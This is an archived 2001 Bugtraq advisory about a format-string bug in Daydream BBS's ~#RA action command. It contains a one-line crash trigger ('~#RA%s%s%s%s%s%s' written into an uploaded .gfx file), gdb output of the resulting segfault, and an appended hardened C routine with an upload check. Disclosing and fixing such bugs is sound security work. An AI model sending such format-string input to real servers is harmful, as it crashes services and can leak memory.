List: bugtraq
Subject: Daydream BBS Format strings issue.
From: KF <dotslash () snosoft ! com>
Date: 2001-12-31 0:14:31
Daydream BBS recently underwent some security changes. Although the buffer overflow was fixed in the ~#RA command, I am not sure if a format strings issue was addressed. It's my understanding that the users of Daydream have the option of adding "Action commands" ("~#RA" being one of them) into the text files that they post. If a user forms a specially crafted text file, uploads it to Daydream and then views the message using the menu system, the issue could be exploited.
background info:

~#RA[FILE]|[max]|
Show random textfile. Format for file is "/path/foobar%d.ext", where %d is a random number (1-[max]).

example:

echo "~#RA%s%s%s%s%s%s" > filetoupload.gfx. Then place this file on the server and view it via the menu system.
Simple test to prove existence:

[root@linuxppc bbs]# echo "~#RA%s%s%s%s%s%s" > display/iso/welcome.gfx
·| All accounts deleted - login |·
:| as NEW! |:
.:| |:.
. ....:::| NEW / CHAT / LOGOFF |:::.... .
`------------------------------'
Username: test
Password: ****
Program received signal SIGSEGV, Segmentation fault.
formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n", flags=268615586) at typetext.c:594
594 *cm++ = *sr++;
(gdb) bt
#0 formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n", flags=268615586) at typetext.c:594
(gdb) x/10s $r1
0x7fffd440: "\177ÿÚ\220\020\001Öì%s%s%s%s%s%s\n"
-KF
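The hardened counterpart to the ~#RA expansion described in the post above, as an added example that is not Daydream's code: the user-supplied path template is copied literally and only the documented %d is substituted, never passed to printf() as a format string, plus a sysop-side check for uploaded text. The function names and the assumed [FILE]-field layout are mine, not Daydream's.

```c
#include <stdio.h>
#include <string.h>

/* Hardened ~#RA path expansion (added example, not Daydream's code).
 * The template "/path/foobar%d.ext" comes from an uploaded .gfx file,
 * so it must never be handed to printf() as the format string. It is
 * copied literally; exactly one "%d" is replaced by the random number
 * and any other '%' directive is refused.
 * Returns 0 on success, -1 on a bad template or if the output does not fit. */
int expand_random_path(const char *tmpl, int number, char *out, size_t outsz)
{
    size_t o = 0;
    int seen_d = 0;
    for (const char *p = tmpl; *p; p++) {
        if (*p == '%') {
            if (p[1] == 'd' && !seen_d) {
                int n = snprintf(out + o, outsz - o, "%d", number);
                if (n < 0 || (size_t)n >= outsz - o) return -1;
                o += (size_t)n;
                seen_d = 1;
                p++;                 /* skip the 'd' */
                continue;
            }
            return -1;               /* "%s", "%n", "%%", a second "%d": refuse */
        }
        if (o + 1 >= outsz) return -1;
        out[o++] = *p;
    }
    if (o >= outsz) return -1;
    out[o] = '\0';
    return 0;
}

/* Sysop-side check for uploaded text (assumed line format: the [FILE]
 * field runs from "~#RA" to the first '|'). Returns 1 if the command
 * carries anything other than the single documented "%d", else 0. */
int ra_command_is_suspicious(const char *line)
{
    const char *cmd = strstr(line, "~#RA");
    if (!cmd) return 0;
    int d_count = 0;
    for (const char *p = cmd + 4; *p && *p != '|'; p++) {
        if (*p != '%') continue;
        if (p[1] != 'd' || d_count++) return 1;
        p++;                         /* skip the 'd' */
    }
    return 0;
}
```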